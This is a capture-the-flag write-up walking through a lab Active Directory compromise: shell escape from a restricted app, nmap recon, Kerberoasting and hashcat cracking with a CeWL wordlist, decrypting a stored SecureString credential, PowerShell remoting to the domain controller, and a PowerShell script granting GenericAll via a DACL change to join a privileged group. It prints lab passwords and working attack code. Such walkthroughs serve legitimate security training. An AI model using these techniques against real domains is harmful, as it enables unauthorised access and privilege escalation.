
Getting the hints
In order to block the naughty IPs and get the hint, fail2ban needs to be configured as follows:
/etc/fail2ban/filter.d/hohono.conf
[Definition]
failregex = ^.* Failed login from <HOST> for .*$
            ^.* Invalid heartbeat .* from <HOST>$
            ^.* from <HOST> rejected .*$
            ^.* <HOST> sent a malformed .*$
/etc/fail2ban/jail.d/hohono.conf
[hohono]
enabled = true
logpath = /var/log/hohono.log
findtime = 3600
maxretry = 10
filter = hohono
action = hohono
/etc/fail2ban/action.d/hohono.conf
[Definition]
actionban = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>
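Before pointing fail2ban at the live log it is worth checking that the filter and the jail thresholds really behave as intended. The following Python simulation is an added example, not part of the original write-up and not fail2ban's own code: it applies the four failregex lines above and the findtime/maxretry settings to constructed log lines. It assumes a `YYYY-MM-DD HH:MM:SS` timestamp prefix (which fail2ban strips itself before matching) and simplifies `<HOST>` to an IPv4 address, whereas the real placeholder also matches hostnames and IPv6.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# The four failregex lines from filter.d/hohono.conf, with fail2ban's <HOST> placeholder.
FAILREGEX = [
    r"^.* Failed login from <HOST> for .*$",
    r"^.* Invalid heartbeat .* from <HOST>$",
    r"^.* from <HOST> rejected .*$",
    r"^.* <HOST> sent a malformed .*$",
]
FINDTIME = 3600   # seconds, from jail.d/hohono.conf
MAXRETRY = 10

# Simplification: only IPv4 addresses. Real fail2ban's <HOST> also matches hostnames and IPv6.
HOST_PATTERN = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
COMPILED = [re.compile(p.replace("<HOST>", HOST_PATTERN)) for p in FAILREGEX]

# Assumed log layout: "YYYY-MM-DD HH:MM:SS <message>". fail2ban strips the timestamp
# itself before applying failregex; this does the same by hand.
LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (.*)$")


def match_failure(message):
    """Return the offending IP when a (timestamp-stripped) message matches a failregex, else None."""
    for rx in COMPILED:
        m = rx.match(message)
        if m:
            return m.group("host")
    return None


def find_bans(log_text, findtime=FINDTIME, maxretry=MAXRETRY):
    """Replay the log and return, in order, the IPs that accumulate maxretry
    matching failures inside any findtime-second window (the jail's ban condition)."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    banned = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        ip = match_failure(m.group(2))
        if ip is None or ip in banned:
            continue
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]) > timedelta(seconds=findtime):
            window.popleft()          # expire failures older than findtime
        if len(window) >= maxretry:
            banned.append(ip)         # fail2ban would now run: /root/naughtylist add <ip>
    return banned


def build_sample_log():
    """Constructed sample of /var/log/hohono.log (not real data from the challenge)."""
    lines = []
    shapes = [
        "hohono: Failed login from 10.1.1.5 for elf",
        "hohono: Invalid heartbeat 'deadbeef' from 10.1.1.5",
        "hohono: Connection from 10.1.1.5 rejected by policy",
        "hohono: Client 10.1.1.5 sent a malformed packet",
    ]
    # 10.1.1.5: ten failures in ten minutes, exercising every failregex shape -> ban
    for i in range(10):
        lines.append(f"2021-12-23 03:{i:02d}:00 {shapes[i % 4]}")
    # 10.1.1.9: ten failures spread over three hours -> never ten inside one hour, no ban
    for i in range(10):
        t = datetime(2021, 12, 23, 4, 0, 0) + timedelta(minutes=20 * i)
        lines.append(f"{t:%Y-%m-%d %H:%M:%S} hohono: Failed login from 10.1.1.9 for santa")
    # Benign traffic that must not match any failregex
    lines.append("2021-12-23 05:00:00 hohono: Successful login from 10.1.1.7 for elf")
    return "\n".join(lines)


if __name__ == "__main__":
    print(find_bans(build_sample_log()))   # ['10.1.1.5']
```

Against the real log, `fail2ban-regex /var/log/hohono.log /etc/fail2ban/filter.d/hohono.conf` is the tool that confirms each failregex line actually matches and extracts the host; the simulation only shows how the thresholds interact with the matches.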
The challenge
Getting access to the machine
To start the challenge, we need to escape this application:

Press CTRL+D to get a Python console:

Use os.system to get a shell:
import os
os.system('/bin/bash')

Let's make /bin/bash our default shell using chsh:

Recon
rzcmxnacvh@grades:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 21967028 bytes 2041704471 (2.0 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24790319 bytes 3583308774 (3.5 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
rzcmxnacvh@grades:~$ nmap 172.17.0.2/24
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-06 04:29 UTC
Nmap scan report for 172.17.0.1
Host is up (0.00050s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap scan report for grades.elfu.local (172.17.0.2)
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.17.0.3
Host is up (0.00051s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 172.17.0.4
Host is up (0.00056s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
42/tcp open nameserver
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
1024/tcp open kdm
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap scan report for 172.17.0.5
Host is up (0.00054s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 256 IP addresses (5 hosts up) scanned in 3.01 seconds
Interesting: an SMB service (port 445) on the machines *.3, *.4 and *.5. Let's have a look at what we have access to:
ovvvhdiilp@grades:~$ smbclient -L 172.17.0.4
Enter WORKGROUP\ovvvhdiilp's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
elfu_svc_shr Disk elfu_svc_shr
research_dep Disk research_dep
IPC$ IPC IPC Service (Samba 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
It seems that our goal will be to get access to research_dep! Let's do it.
Finding the Domain Controller
According to the hint (next screenshot), other interesting machines, besides the 172.17.0.x ones, are present in the 10.x.x.x range. Let's discover them:

# Get 10.x.x.x ips within the network
ovvvhdiilp@grades:~$ ip route
default via 172.17.0.1 dev eth0
10.128.1.0/24 via 172.17.0.1 dev eth0
10.128.2.0/24 via 172.17.0.1 dev eth0
10.128.3.0/24 via 172.17.0.1 dev eth0
172.17.0.0/16 dev eth0 proto kernel scope link src 172.17.0.2
To find the domain controller, we run the nmap script ldap-rootdse against port 389 on the different IP ranges:
ovvvhdiilp@grades:~$ nmap -sT -Pn -n --open 10.128.1.0/24 -sV -p389 --script ldap-rootdse
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 01:25 UTC
Nmap scan report for 10.128.1.53
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: elfu.local, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 3
| forestFunctionality: 3
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=elfu,DC=local
| ldapServiceName: elfu.local:dc01$@ELFU.LOCAL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| ...
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=elfu,DC=local
| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=elfu,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=elfu,DC=local
| namingContexts: DC=elfu,DC=local
| namingContexts: CN=Configuration,DC=elfu,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=elfu,DC=local
| namingContexts: DC=DomainDnsZones,DC=elfu,DC=local
| namingContexts: DC=ForestDnsZones,DC=elfu,DC=local
| isSynchronized: TRUE
| highestCommittedUSN: 174816
| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=elfu,DC=local
| dnsHostName: DC01.elfu.local
| defaultNamingContext: DC=elfu,DC=local
| currentTime: 20220107012603.0Z
|_ configurationNamingContext: CN=Configuration,DC=elfu,DC=local
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (256 hosts up) scanned in 8.38 seconds
Getting more details about Ldap
Knowing the domain controller, 10.128.1.53 we can now launch the ldapdomaindump which is present in the grades machine:
ovvvhdiilp@grades:~$ ldapdomaindump -u "ELFU\ovvvhdiilp" "ldap://10.128.1.53:389"
Password:
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

It generates the files above, which describe the domain in several formats (HTML, JSON and grep-friendly text). At this stage this data does not really move us forward; let's keep it aside, we will certainly need it later.
Finding service principal names
Let's now try the Impacket script GetUserSPNs.py, which is present on the machine:

Interesting. It lists elfu_svc, whose name matches one of the SMB shares we discovered at the beginning, elfu_svc_shr on 172.17.0.4.
Let's run GetUserSPNs.py again with the -request argument to request a TGS:

We now have a krb5tgs hash that we need to crack offline to recover the password of the user elfu_svc.
Getting elfu_svc password
I used hashcat for this. In my first attempts I used rockyou.txt as the word list; it didn't work. Based on the hints, I then added the rule OneRuleToRuleThemAll.rule, which made hashcat estimate that the run would take more than three days. Disappointing. I interrupted it and double-checked the hints again.
I finally realised that I needed a dedicated word list generated with CeWL. CeWL parses a website (URL given as argument) and gathers all the words present on it. In my first, failed attempt I used the ELF University website as the argument. Based on the hints, I then added the argument --with-numbers to also include strings that contain numbers.
ruby cewl -d 10 -m 5 --with-numbers -w elfu_words_with_numbers.txt https://register.elfu.org/register
I fed the new word list to hashcat and, bingo, we finally have elfu_svc's password: Snow2021!
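To make visible why the --with-numbers switch was the missing piece, here is an added Python approximation of CeWL's word extraction. It is not part of the original write-up and not CeWL's own code: the HTML page is constructed, and the tokenisation (split on anything that is not a letter, or not a letter or digit when numbers are allowed; keep tokens of at least `-m` characters) is a simplification of what CeWL really does. The point it demonstrates is that a candidate such as Snow2021 collapses to the four-letter "Snow" and is dropped at `-m 5` unless digits are accepted inside words.

```python
import re
from html.parser import HTMLParser

# Constructed stand-in for the registration page; not the real register.elfu.org content.
SAMPLE_HTML = """<html><head><title>ELF University Registration</title>
<script>var sessionToken2022 = "not-a-word";</script></head>
<body><h1>Welcome to ELF University registration</h1>
<p>Use the Snow2021 reception code to complete your enrolment. Fa-la-la!</p>
</body></html>"""


class _TextExtractor(HTMLParser):
    """Collects the visible text of a page, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.parts.append(data)


def visible_text(html):
    parser = _TextExtractor()
    parser.feed(html)
    parser.close()
    return " ".join(parser.parts)


def build_wordlist(html, min_length=5, with_numbers=False):
    """Unique candidate words in order of first appearance.

    min_length mirrors CeWL's -m. Without with_numbers only purely alphabetic
    runs are kept, so 'Snow2021' collapses to 'Snow' and is dropped at -m 5;
    with_numbers (CeWL's --with-numbers) keeps letter/digit mixes intact.
    This approximates CeWL's tokenisation rather than reproducing its exact rules.
    """
    token_re = r"[A-Za-z][A-Za-z0-9]*" if with_numbers else r"[A-Za-z]+"
    words = []
    for token in re.findall(token_re, visible_text(html)):
        if len(token) >= min_length and token not in words:
            words.append(token)
    return words


def write_wordlist(words, path):
    """Write one candidate per line, the dictionary format hashcat consumes."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")


if __name__ == "__main__":
    print(build_wordlist(SAMPLE_HTML))
    print(build_wordlist(SAMPLE_HTML, with_numbers=True))
```

The resulting file is the dictionary handed to hashcat; for a Kerberoasted ticket the mode is 13100 (Kerberos 5 TGS-REP etype 23). Note that CeWL alone cannot produce the trailing "!" of Snow2021!: a rule set such as the one tried earlier supplies suffixes of that kind, which is why the word list and the rule belong together rather than being alternatives.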

Getting remote access to the domain controller
Let's now have a look at elfu_svc's shared folder:

It contains tons of PS1 scripts. Promising. Let's analyse their content. I wrote this short Python script to download them:
import subprocess

# all_files_in_elfu_svc_shr.txt holds the share listing; the file name is the first field of each line.
SHARE = r'\\172.17.0.4\elfu_svc_shr'

with open('all_files_in_elfu_svc_shr.txt') as listing:
    for line in listing:
        fields = line.split()
        if not fields:
            continue
        script_name = fields[0]          # names containing spaces would need a smarter split
        print(script_name)
        # Argument list instead of a shell string: no backslash/quote escaping and no shell
        # injection through odd file names. -E sends smbclient messages to stderr, user%password is one -U value.
        subprocess.run(
            ['smbclient', '-E', '-U', 'elfu_svc%Snow2021!', SHARE, '-c', f'get {script_name}'],
            check=False,
        )
I first grepped for "password", "username" and similar. I found some credentials, such as a user called "LabAdmin", that I tested in different places, but they were not interesting.
rtscahotny@grades:~/all_files_in_elfu_svc$ grep -i password= *
CreateVMFleetDisk.ps1: $AdminPassword=Read-Host
Generate-SymbolsInNavContainer.ps1: $ProcessArguments += ", ntauthentication=0, username=""$($sqlCredential.UserName)"", password=""$([System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sqlCredential.Password)))"""
LabConfig.ps1:$LabConfig=@{ DomainAdminName='LabAdmin'; AdminPassword='LS1setup!'; Prefix = 'MSLab-' ; DCEdition='4'; Internet=$true ; AdditionalNetworksConfig=@(); VMs=@()}
LabConfig.ps1: AdminPassword="LS1setup!"; # Used during 2_CreateParentDisks. If changed after, it will break the functionality of 3_Deploy.ps1
New-NavContainer.ps1: "--env securePassword=$encPassword",
New-NavContainer.ps1: "--env databaseSecurePassword=$encDatabasePassword"
New-NavContainer.ps1: "--env encryptionSecurePassword=$encDatabasePassword"
I then grepped for "elfu" and got the following interesting result:

Let's have a look at the script GetProcessInfo.ps1:

And execute it:

The script makes the remote_elf account open a remote PowerShell session to the DC and gather the running processes. Inspired by this script, we can now log in to the DC with the following lines:
$SecStringPassword="76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
# The same 16-byte key the script uses turns the encrypted standard string above back into a SecureString.
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
# Wrap the recovered secret in a PSCredential for the remote_elf domain account ...
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
# ... and open an interactive PowerShell remoting session on the DC (10.128.1.53).
Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred

Giving my user access to research_dep shared folder
Once on the domain controller, I attempted to run the following PS1 script to grant my user GenericAll (full control) over the Domain Admins group:
# Target object: the Domain Admins group.
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=elfu,DC=local"
$username = "rtscahotny"
# Empty GUIDs: the ACE is not restricted to a single property or object type.
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
# Resolve the user to its SID, which is what the ACE stores.
$IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
# Allow GenericAll on the object for that SID.
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"),([System.Security.AccessControl.AccessControlType] "Allow"),$propGUID,$inheritanceType,$nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
# Only read and write back the DACL, not the owner or SACL.
$secOptions=$domainDirEntry.get_Options()
$secOptions.SecurityMasks=[System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.psbase.get_ObjectSecurity().addAccessRule($ACE)
$domainDirEntry.psbase.CommitChanges()   # fails unless the bound account may write the object's DACL
$domainDirEntry.dispose()
It didn't work: it said that it cannot commit changes. Writing a DACL requires the bound account, here remote_elf, to hold WriteDacl (or ownership) on the target object, and it evidently has no such right over Domain Admins.

So we need to find another way of giving my user access to the research share.
As our goal is to access the research shared folder, let's grep for "research" in the files we previously obtained with ldapdomaindump:

As you can see, we now know that members of the group "Research Department" have access to the shared folder we are interested in. I now need to add my user to this group. What about replacing "Domain Admins" with "Research Department" in the first line of the above script? Let's give it a try:

No error messages! It seems to be done. With GenericAll on the group, we can now add my user to it:

Let's now log out of the DC and try accessing the research share:

I then copied the PDF to my local machine using scp, as follows. The first secret ingredient is Kindness!
